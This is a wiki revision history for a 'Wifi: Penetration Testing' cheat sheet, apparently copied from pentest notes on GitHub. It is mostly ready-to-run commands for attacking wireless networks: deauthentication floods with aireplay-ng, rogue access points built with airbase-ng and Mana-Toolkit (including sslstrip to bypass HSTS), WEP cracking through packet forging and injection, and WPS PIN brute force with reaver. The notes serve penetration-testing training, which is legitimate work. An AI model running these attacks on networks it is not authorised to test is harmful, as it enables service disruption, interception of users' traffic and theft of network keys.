Kangtain: /* Creating fake access point using Mana-Toolkit */

2023-02-04T16:49:36Z

Creating fake access point using Mana-Toolkit

← Older revision		Revision as of 23:49, 4 February 2023
Line 85:		Line 85:
	# start-nat-simple: starts a regular AP using internet connection in upstream interface.		# start-nat-simple: starts a regular AP using internet connection in upstream interface.
	# start-nat-full: starts AP with internet connection, it also starts sslstrip, sslsplit, firelamp and attempts to bypass HTST. <kbd>''<nowiki>{{Sometimes this script is not working}}</nowiki>''</kbd>		# start-nat-full: starts AP with internet connection, it also starts sslstrip, sslsplit, firelamp and attempts to bypass HTST. <kbd>''<nowiki>{{Sometimes this script is not working}}</nowiki>''</kbd>
			<syntaxhighlight lang="bash">
			## install Mana-Toolkit
			> apt-get install mana-toolkit

	~~## install Mana-Toolkit~~		## Modify configuration files
	~~> apt-get install mana-toolkit~~		> vim /etc/mana-toolkit/hostapd-karma.conf
			> vim /usr/share/mana-toolkit/run-mana/start-nat-simple.sh
	## Modify configuration files
	> vim /etc/mana-toolkit/hostapd-karma.conf		# run the script
	> vim /usr/share/mana-toolkit/run-mana/start-nat-simple.sh		> bash /usr/share/mana-toolkit/run-mana/start-nat-simple.sh
			</syntaxhighlight>
	# run the script
	> bash /usr/share/mana-toolkit/run-mana/start-nat-simple.sh

	== WEP Cracking ==		== WEP Cracking ==
Line 106:		Line 107:

	=== Simple WEP cracking (In case of a busy network with active users and high IV rate) ===		=== Simple WEP cracking (In case of a busy network with active users and high IV rate) ===
	## Run airodump-ng to log all traffic from the target network		<syntaxhighlight lang="bash">
	## airodump-ng --channel [channel] --bssid [bssid] --write [file-name] [interface]		## Run airodump-ng to log all traffic from the target network
	> airodump-ng --channel 6 --bssid 11:22:33:44:55:66 --write out mon0		## airodump-ng --channel [channel] --bssid [bssid] --write [file-name] [interface]
			> airodump-ng --channel 6 --bssid 11:22:33:44:55:66 --write out mon0
	## At the same time we shall use aircrack-ng to try and crack the capture file created by the above command
	> aircrack-ng out-01.cap		## At the same time we shall use aircrack-ng to try and crack the capture file created by the above command
			> aircrack-ng out-01.cap
	## Keep both programs running at the same time and aircrack-ng will be able to determine the key when the number of IVs in out-01.cap is enough.
			## Keep both programs running at the same time and aircrack-ng will be able to determine the key when the number of IVs in out-01.cap is enough.
			</syntaxhighlight>

	=== Packet Injection ===		=== Packet Injection ===

Kangtain: /* WPA / WPA2 Cracking */

2023-02-04T16:46:43Z

WPA / WPA2 Cracking

← Older revision		Revision as of 23:46, 4 February 2023
Line 169:		Line 169:
	## Start Cracking WPS pin with reaver		## Start Cracking WPS pin with reaver
	> reaver -b [target MAC] -c [channel] -i mon0		> reaver -b [target MAC] -c [channel] -i mon0

			== Source ==

			* [https://github.com/wwong99/pentest-notes/blob/master/wifi/wifi_penetration_testing.md github.com]

			[[Category:Security]]
			[[Category:Wifi]]

Kangtain: Created page with "== Change MAC adress == > ifconfig wlan0 down > macchanger —random wlan0 > ifconfig wlan0 up Wifi card default mode is “managed mode” only capture data packets that contains it’s MAC address. In `monitor mode` it captures every data packet in it’s wifi range == Enable monitor mode == > ifconfig wlan0 down > airmon-ng start wlan0 ##( Some times it does not work) || OR use..."

2023-02-04T16:45:20Z

Created page with "== Change MAC adress == <syntaxhighlight lang="bash"> > ifconfig wlan0 down > macchanger —random wlan0 > ifconfig wlan0 up </syntaxhighlight>Wifi card default mode is “managed mode” only capture data packets that contains it’s MAC address. In <code>monitor mode</code> it captures every data packet in it’s wifi range == Enable monitor mode == <syntaxhighlight lang="bash"> > ifconfig wlan0 down > airmon-ng start wlan0 ##( Some times it does not work) || OR use..."

New page

== Change MAC adress ==
<syntaxhighlight lang="bash">
> ifconfig wlan0 down
> macchanger —random wlan0
> ifconfig wlan0 up
</syntaxhighlight>Wifi card default mode is “managed mode” only capture data packets that contains it’s MAC address.

In <code>monitor mode</code> it captures every data packet in it’s wifi range

== Enable monitor mode ==
<syntaxhighlight lang="bash">
> ifconfig wlan0 down
> airmon-ng start wlan0
##( Some times it does not work) || OR use ||
> iwconfig wlan0 mode monitor
</syntaxhighlight>

== Packet sniffing ==

=== To sniff all packets from all networks around you ===
<syntaxhighlight lang="bash">
> airodump-ng mon0
## || OR ||
> airodump-ng wlan0 ## whateva the name of wlan in monitor mode
</syntaxhighlight>

=== To sniff all the packets from a specific network ===
<syntaxhighlight lang="bash">
> airodump-ng —channel 2 —bssid 00:a2:23:23:43:53 —write out mon0
</syntaxhighlight>

== De-authentication attacks practical ==

=== To de-authenticate all clients in a specific network ===
<syntaxhighlight lang="bash">
## aireplay-ng —deauth [number of packets] -a [AP] [interface]
> aireplay-ng —deauth 1000 -a 11:22:33:44:55:66 mon0
</syntaxhighlight>

=== To de-authenticate a specific client in a network ===
<syntaxhighlight lang="bash">
## First we will run airodump-ng to see which devices (stations) are connected to this network.
> airodump-ng —channel 2 —bssid 00:a2:23:23:43:53 mon0

## aireplay-ng —deauth [number of packets] -a [AP] -c [target] [interface]
> aireplay-ng —deauth 1000 -a 11:22:33:44:55:66 -c 00:AA:22:33:44:55:66 mon0
</syntaxhighlight>

== Creating Fake AP ==
<syntaxhighlight lang="bash">
## install dns masq (Only do this once)
> apt-get install dnsmasq

## Edit dhcp configuration
> echo -e "interface=at0\ndhcp-range=192.168.0.50,192.168.0.150,12h" > /etc/dnsmasq.conf

## start fake ap
## airbase-ng -e [network name] -c [channel] interface
> airbase-ng -e fake-ap -c 6 mon0
> ifconfig at0 192.168.0.1 up

## Removing iptables rules
> iptables --flush
> iptables --table nat --flush
> iptables --delete-chain

## Enable packet forwarding in iptables
> iptables -P FORWARD ACCEPT

## link the wifi card and the card that's connected to the internet
> iptables -t nat -A POSTROUTING -o [internet interface] -j MASQUERADE

## start dnsmasq
> dnsmasq

## Enable ip forward
> echo "1" > /proc/sys/net/ipv4/ip_forward
</syntaxhighlight>

== Creating fake access point using Mana-Toolkit ==

=== It has 3 main scripts ===

# start-noupstream: starts AP with NO internet connection.
# start-nat-simple: starts a regular AP using internet connection in upstream interface.
# start-nat-full: starts AP with internet connection, it also starts sslstrip, sslsplit, firelamp and attempts to bypass HTST. <kbd>''<nowiki>{{Sometimes this script is not working}}</nowiki>''</kbd>

## install Mana-Toolkit
> apt-get install mana-toolkit

## Modify configuration files
> vim /etc/mana-toolkit/hostapd-karma.conf
> vim /usr/share/mana-toolkit/run-mana/start-nat-simple.sh

# run the script
> bash /usr/share/mana-toolkit/run-mana/start-nat-simple.sh

== WEP Cracking ==

* WEP is an old encryption, but it's still used in some networks.
* It uses an algorithm called [RC4] where each packet is encrypted at the AP and then decrepted at the client.
* WEP insures that each packet has a unique key stream by using a random 24 bit ''initialization vector [IV]''
* IV is contained in the packets as a plain text.
* The short IV means in a busy network we can collect more than two packets with the same IV, then we can use aircrack-ng to determine the key stream and the WEP key using statistical attacks.
* Conclusion: More IV's we captue, the more likely for us to crack the key.

=== Simple WEP cracking (In case of a busy network with active users and high IV rate) ===
## Run airodump-ng to log all traffic from the target network
## airodump-ng --channel [channel] --bssid [bssid] --write [file-name] [interface]
> airodump-ng --channel 6 --bssid 11:22:33:44:55:66 --write out mon0

## At the same time we shall use aircrack-ng to try and crack the capture file created by the above command
> aircrack-ng out-01.cap

## Keep both programs running at the same time and aircrack-ng will be able to determine the key when the number of IVs in out-01.cap is enough.

=== Packet Injection ===

==== Fake authentication ====
## aireplay-ng --fakeauth [number of packets] -a [target MAC] -h [your MAC] [interface]
> aireplay-ng --fakeauth 0 -a 00:AA:22:33:44:55:66 -h 00:11:22:33:44:55:66 mon0
## Id this fake authentication was successful, The value under the "AUTH" column in airodump-ng will change to "OPN"

==== ARP request reply ====
## aireplay-ng --arpreply -b [target MAC] -h [your MAC] [interfce]
> aireplay-ng --arpreply -b 00:AA:22:33:44:55:66 -h 00:11:22:33:44:55:66 mon0

==== Korek chop chop ====
## 1. Capture the packet and determine it's key start-noupstream
## aireplay-ng --chopchop -b [target MAC] -h [your MAC] [interface]
> aireplay-ng --chopchop -b 00:AA:22:33:44:55:66 -h 00:11:22:33:44:55:66 mon0

## 2. Forge a new packet
## packetforge-ng -0 -a [target MAC] -h [your MAC] -k 255.255.255.255 -l 255.255.255.255 -y [output from last step.xor] - w [output]
> packetforge-ng -0 -a 00:AA:22:33:44:55:66 -h 00:11:22:33:44:55:66 -k 255.255.255.255 -l 255.255.255.255 -y 1122out.xor - w chop-out

## 3. Inject the forged packet into the traffic to generate new IV's
## aireplay-ng -2 -r [out from last step] [interface]
> aireplay-ng -2 -r chop-out mon0

==== Fragmentation attack ====

* The goal of this method is to obtain 1500 bytes of the PRGA (pseudo random generation algorithm), this can be used to forge a new oachet which can be injeted into the traffic to generate new IV's

## 1. Obtain PRGA
## airplay-ng --fragment -b [target MAC] -h [your MAC] [interface]
> airplay-ng --fragment -b 00:AA:22:33:44:55:66 -h 00:11:22:33:44:55:66 mon0

## 2. Forge a new packet
## packetforge-ng -0 -a [target MAC] -h [your MAC] -k 255.255.255.255 -l 255.255.255.255 -y [output from last step.xor] - w [output]
> packetforge-ng -0 -a 00:AA:22:33:44:55:66 -h 00:11:22:33:44:55:66 -k 255.255.255.255 -l 255.255.255.255 -y 1122out.xor - w chop-out

## 3. Inject the forged packet into the traffic to generate new IV's
## aireplay-ng -2 -r [out from last step] [interface]
> aireplay-ng -2 -r chop-out mon0

== WPA / WPA2 Cracking ==

=== WPS feature ===

* WPS allows users to connect to WPS enabled networks easily using WPS button on the router or by clicking on WPS functionality in router configuration.
* Authentication is done using 8 digit long pin
* Using brute force we can guess the pin in < 10 hours.
* A tool called reaver can then recover the WPA/WPA2 key from this pin.

## To scan for WPS enabed networks
> wash -i mon0 --ignore-fcs

## Start Cracking WPS pin with reaver
> reaver -b [target MAC] -c [channel] -i mon0

Wifi: Penetration Testing - Revision history

Kangtain: /* Creating fake access point using Mana-Toolkit */

Kangtain: /* WPA / WPA2 Cracking */